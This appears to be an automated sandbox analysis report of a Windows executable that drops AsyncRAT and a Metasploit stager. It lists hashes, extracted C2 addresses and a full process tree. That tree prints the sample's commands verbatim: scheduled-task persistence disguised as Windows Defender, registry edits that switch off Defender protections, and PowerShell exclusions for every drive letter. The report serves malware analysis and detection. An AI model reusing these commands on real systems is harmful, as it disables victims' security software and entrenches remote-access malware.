Overview

overview

10

Static

static

3

00421ec0e5...22.exe

windows7-x64

10

00421ec0e5...22.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    51s
  • max time network
    53s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    26/03/2025, 19:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe

  • Size

    13.0MB

  • MD5

    66f293c1394e81b02da06a86f5bcb249

  • SHA1

    ac0b8acc5eb9395d6a8a40be01a3e75a7208e23c

  • SHA256

    00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22

  • SHA512

    b3bd8252473e9960cdf32d3d89e6f1df3ced96621ae12d085e58705dd12803d5a3e90e1a6899545921f7f32f2bf9072fd26d147a0dd2fb4d3edc21f0a756ca1e

  • SSDEEP

    393216:mtoHOLHsaSZ2pczKc1esHdZYjzGLO51D6GCoJ:NOL7mH9ZEN5h6RE

Score
10/10
asyncratmetasploitdefaultbackdoordefense_evasiondiscoveryevasionexecutionrattrojan

Malware Config

Extracted

Family

asyncrat

Botnet

Default

C2

127.0.0.1:3001

108.252.227.16:3001
Attributes
  • delay

    1

  • install

    true

  • install_file

    dsg$4yt.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

metasploit

Version

metasploit_stager

C2

0.0.0.0:3000

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

    trojanbackdoormetasploit
  • Metasploit family
    metasploit
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs
    defense_evasiontrojan
  • Async RAT payload 1 IoCs
    rat
  • Command and Scripting Interpreter: PowerShell 1 TTPs 26 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious use of AdjustPrivilegeToken 28 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe
    "C:\Users\Admin\AppData\Local\Temp\00421ec0e50c06c0d20a438de1d7f355b02ac6bec317bb4493fee4e291833f22.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1804
    • C:\Users\Admin\AppData\Local\Temp\HOlC2.1.exe
      "C:\Users\Admin\AppData\Local\Temp\HOlC2.1.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2380
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Windows Defender"
        3⤵
          PID:1752
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c COPY "C:\Users\Admin\AppData\Local\Temp\HOlC2.1.exe" "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe"
          3⤵
            PID:2688
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c SCHTASKS /CREATE /SC ONLOGON /TN "Windows Defender\Defender Scan" /TR "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe" /F /RU "SYSTEM"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2808
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /CREATE /SC ONLOGON /TN "Windows Defender\Defender Scan" /TR "C:\Users\Admin\AppData\Local\Windows Defender\Windows Defender.exe" /F /RU "SYSTEM"
              4⤵
              • Scheduled Task/Job: Scheduled Task
              PID:2820
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 01 -f
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2832
            • C:\Windows\system32\reg.exe
              reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 01 -f
              4⤵
              • Modifies Windows Defender DisableAntiSpyware settings
              PID:2976
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 -f
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2936
            • C:\Windows\system32\reg.exe
              reg Add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 -f
              4⤵
              • Modifies Windows Defender Real-time Protection settings
              PID:2852
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "A:\\" -Force
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1932
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe Add-MpPreference -ExclusionPath "A:\\" -Force
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2732
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "B:\\" -Force
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2660
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe Add-MpPreference -ExclusionPath "B:\\" -Force
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2672
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "C:\\" -Force
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2900
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe Add-MpPreference -ExclusionPath "C:\\" -Force
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2952
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "D:\\" -Force
            3⤵
              PID:2636
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe Add-MpPreference -ExclusionPath "D:\\" -Force
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1028
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "E:\\" -Force
              3⤵
                PID:1992
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe Add-MpPreference -ExclusionPath "E:\\" -Force
                  4⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1492
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "F:\\" -Force
                3⤵
                  PID:1044
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell.exe Add-MpPreference -ExclusionPath "F:\\" -Force
                    4⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2896
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "G:\\" -Force
                  3⤵
                    PID:2576
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell.exe Add-MpPreference -ExclusionPath "G:\\" -Force
                      4⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2944
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "H:\\" -Force
                    3⤵
                      PID:1620
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell.exe Add-MpPreference -ExclusionPath "H:\\" -Force
                        4⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:336
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "I:\\" -Force
                      3⤵
                        PID:308
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell.exe Add-MpPreference -ExclusionPath "I:\\" -Force
                          4⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1676
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "J:\\" -Force
                        3⤵
                          PID:1104
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell.exe Add-MpPreference -ExclusionPath "J:\\" -Force
                            4⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2240
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "K:\\" -Force
                          3⤵
                            PID:872
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell.exe Add-MpPreference -ExclusionPath "K:\\" -Force
                              4⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2428
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "L:\\" -Force
                            3⤵
                              PID:1512
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell.exe Add-MpPreference -ExclusionPath "L:\\" -Force
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2284
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "M:\\" -Force
                              3⤵
                                PID:1608
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell.exe Add-MpPreference -ExclusionPath "M:\\" -Force
                                  4⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1604
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "N:\\" -Force
                                3⤵
                                  PID:1956
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell.exe Add-MpPreference -ExclusionPath "N:\\" -Force
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1752
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "O:\\" -Force
                                  3⤵
                                    PID:1804
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell.exe Add-MpPreference -ExclusionPath "O:\\" -Force
                                      4⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2868
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "P:\\" -Force
                                    3⤵
                                      PID:2236
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell.exe Add-MpPreference -ExclusionPath "P:\\" -Force
                                        4⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2252
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Q:\\" -Force
                                      3⤵
                                        PID:1120
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell.exe Add-MpPreference -ExclusionPath "Q:\\" -Force
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2608
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "R:\\" -Force
                                        3⤵
                                          PID:2460
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell.exe Add-MpPreference -ExclusionPath "R:\\" -Force
                                            4⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2120
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "S:\\" -Force
                                          3⤵
                                            PID:1948
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell.exe Add-MpPreference -ExclusionPath "S:\\" -Force
                                              4⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1908
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "T:\\" -Force
                                            3⤵
                                              PID:1688
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell.exe Add-MpPreference -ExclusionPath "T:\\" -Force
                                                4⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1712
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "U:\\" -Force
                                              3⤵
                                                PID:2080
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell.exe Add-MpPreference -ExclusionPath "U:\\" -Force
                                                  4⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2544
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "V:\\" -Force
                                                3⤵
                                                  PID:1132
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell.exe Add-MpPreference -ExclusionPath "V:\\" -Force
                                                    4⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1492
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "W:\\" -Force
                                                  3⤵
                                                    PID:1848
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell.exe Add-MpPreference -ExclusionPath "W:\\" -Force
                                                      4⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:556
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "X:\\" -Force
                                                    3⤵
                                                      PID:2576
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell.exe Add-MpPreference -ExclusionPath "X:\\" -Force
                                                        4⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1840
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Y:\\" -Force
                                                      3⤵
                                                        PID:2564
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell.exe Add-MpPreference -ExclusionPath "Y:\\" -Force
                                                          4⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1732
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath "Z:\\" -Force
                                                        3⤵
                                                          PID:2992
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell.exe Add-MpPreference -ExclusionPath "Z:\\" -Force
                                                            4⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:816
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe"
                                                          3⤵
                                                          • Loads dropped DLL
                                                          PID:2456
                                                          • C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe
                                                            "C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe"
                                                            4⤵
                                                            • Executes dropped EXE
                                                            PID:2052
                                                            • C:\Windows\system32\rundll32.exe
                                                              rundll32
                                                              5⤵
                                                                PID:1280
                                                        • C:\Users\Admin\AppData\Local\Temp\svchost.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:1360
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "dsg$4yt" /tr '"C:\Users\Admin\AppData\Roaming\dsg$4yt.exe"' & exit
                                                            3⤵
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:2340
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks /create /f /sc onlogon /rl highest /tn "dsg$4yt" /tr '"C:\Users\Admin\AppData\Roaming\dsg$4yt.exe"'
                                                              4⤵
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:1852
                                                          • C:\Windows\system32\cmd.exe
                                                            cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp9FA9.tmp.bat""
                                                            3⤵
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:492
                                                            • C:\Windows\system32\timeout.exe
                                                              timeout 3
                                                              4⤵
                                                              • Delays execution with timeout.exe
                                                              PID:816
                                                            • C:\Users\Admin\AppData\Roaming\dsg$4yt.exe
                                                              "C:\Users\Admin\AppData\Roaming\dsg$4yt.exe"
                                                              4⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2676
                                                        • C:\Users\Admin\AppData\Local\Temp\HOIC.2.1.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\HOIC.2.1.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2292

                                                      Network

                                                      MITRE ATT&CK Enterprise v15

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • C:\Users\Admin\AppData\Local\Temp\HOIC.2.1.exe
                                                        Filesize

                                                        8.5MB

                                                        MD5

                                                        451c94a23536dcbba422d7612b34b6ff

                                                        SHA1

                                                        0b419c8b9f60cb9cb8957a6dbccb393b5d072e43

                                                        SHA256

                                                        3c9806f8e132917ef85512505fadaca733e5523c271dd2e2a6925ddb9c3d0df0

                                                        SHA512

                                                        b777963ab9d21efa29528e6a126e616088205aff9e1b63453c731966dccf5f15cf30f17a933d40c98347a2d057b5f2cb40e40847f41476f0f212b28ce12e94de

                                                        Download Submit

                                                      • C:\Users\Admin\AppData\Local\Temp\HOlC2.1.exe
                                                        Filesize

                                                        4.4MB

                                                        MD5

                                                        a2b98f2c39c4ee63db62e17f1922543b

                                                        SHA1

                                                        74ec3e0bd346f66124e31a88342fdb7360795373

                                                        SHA256

                                                        4ffa5259e2480cedc72cb451274b99839415980f79cc8aa00c732e8e3422e900

                                                        SHA512

                                                        54cb755cd150d0dc49ec5023a2be3e1a851300c9d90fe7eb9beca1fecdaf17c31a5a85f4662c0600cc690292b98e078df4295c56d733ee40911bafaf580f13f5

                                                        Download Submit

                                                      • C:\Users\Admin\AppData\Local\Temp\svchost.exe
                                                        Filesize

                                                        63KB

                                                        MD5

                                                        4ba7faa19363c41304cbdc35aa60ba56

                                                        SHA1

                                                        afc806d82fae43d2427bd7b2deaf13c8473847da

                                                        SHA256

                                                        e88d123cf046a30859753771d3052b1290534acca5eaec94d8d0590b86d70178

                                                        SHA512

                                                        7a5fc420bac78206fe35766bd6c908879fc5e7ed88f87f2ff4ebee643a4e554ef6c94de69dec20e44024df7fc46b582dbc4744078e15d657c60f5999001ffda8

                                                        Download Submit

                                                      • C:\Users\Admin\AppData\Local\Temp\tmp9FA9.tmp.bat
                                                        Filesize

                                                        151B

                                                        MD5

                                                        157681154eee201c3dee1a5baae25540

                                                        SHA1

                                                        80398bc0f1f820f3c4cfec8a3fbc06bc21675daf

                                                        SHA256

                                                        75bb15ceeef119812f672de21e1f14d7916cc582f48ddf540e58a73ef00ff660

                                                        SHA512

                                                        dcc9bb7421d98bfb1ea2d2eb3f80f0ffb49b2a14a767655ecb1f8bd56f65881fbd50abb953787ccef57ad4e6a5ba861a7a1bc496105a535ba80ca7e77361f85d

                                                        Download Submit

                                                      • C:\Users\Admin\AppData\Local\Windows Defender\Anti Malware Service.exe
                                                        Filesize

                                                        900KB

                                                        MD5

                                                        3c5edd9bbe4c8fccc43b1849128d4fbc

                                                        SHA1

                                                        e046251308e1dc9b7722b1d32f8bc9593d7c1dc9

                                                        SHA256

                                                        64b38f64129aa45c3b5aa5bd87a682814adec425326603565c0c1d013fdb4cc1

                                                        SHA512

                                                        de3ce4e2f9e689bc7d8b06682f974502d63772e097aa76caa8f83ef961e168b10371f0c1f8e0645005c24162e7fcd7a69f31a4eabc9564d1a50df11ec092cc14

                                                        Download Submit

                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                        Filesize

                                                        7KB

                                                        MD5

                                                        f03740a2f4e6dca5efb38657e7112bc9

                                                        SHA1

                                                        9a7c889884d2a9c00bccd9a591c15e8452caa7a6

                                                        SHA256

                                                        a22fcf2183d3111109032bf341a43c7451a397bb09af38bdc279e07d0b3d8902

                                                        SHA512

                                                        f44127d65413200a0355c2357c5eec4b0e415aae82b63508ada782dc32657f2c2a3c9800e156a5263c082a48a0617b6040a7ddb5ee2b6ea0adffd806e26351d3

                                                        Download Submit

                                                      • memory/1280-222-0x0000000000060000-0x0000000000061000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/1280-224-0x0000000000060000-0x0000000000061000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/1360-13-0x0000000001110000-0x0000000001126000-memory.dmp

                                                        Filesize

                                                        88KB

                                                        Download

                                                      • memory/1360-43-0x000007FEF5AA0000-0x000007FEF648C000-memory.dmp

                                                        Filesize

                                                        9.9MB

                                                        Download

                                                      • memory/1360-71-0x000007FEF5AA0000-0x000007FEF648C000-memory.dmp

                                                        Filesize

                                                        9.9MB

                                                        Download

                                                      • memory/1804-0-0x000007FEF5AA3000-0x000007FEF5AA4000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/1804-1-0x0000000000A90000-0x0000000001792000-memory.dmp

                                                        Filesize

                                                        13.0MB

                                                        Download

                                                      • memory/2052-227-0x000000013F310000-0x000000013F3F7000-memory.dmp

                                                        Filesize

                                                        924KB

                                                        Download

                                                      • memory/2292-35-0x0000000000390000-0x00000000003B0000-memory.dmp

                                                        Filesize

                                                        128KB

                                                        Download

                                                      • memory/2292-23-0x0000000010000000-0x00000000100C8000-memory.dmp

                                                        Filesize

                                                        800KB

                                                        Download

                                                      • memory/2292-27-0x0000000000310000-0x0000000000320000-memory.dmp

                                                        Filesize

                                                        64KB

                                                        Download

                                                      • memory/2380-210-0x000000013FBC0000-0x0000000140030000-memory.dmp

                                                        Filesize

                                                        4.4MB

                                                        Download

                                                      • memory/2672-55-0x000000001B800000-0x000000001BAE2000-memory.dmp

                                                        Filesize

                                                        2.9MB

                                                        Download

                                                      • memory/2672-56-0x00000000004B0000-0x00000000004B8000-memory.dmp

                                                        Filesize

                                                        32KB

                                                        Download

                                                      • memory/2676-112-0x0000000000850000-0x0000000000866000-memory.dmp

                                                        Filesize

                                                        88KB

                                                        Download

                                                      • memory/2732-48-0x000000001B900000-0x000000001BBE2000-memory.dmp

                                                        Filesize

                                                        2.9MB

                                                        Download

                                                      • memory/2732-49-0x0000000001D90000-0x0000000001D98000-memory.dmp

                                                        Filesize

                                                        32KB

                                                        Download

                                                      • memory/2952-70-0x0000000001E80000-0x0000000001E88000-memory.dmp

                                                        Filesize

                                                        32KB

                                                        Download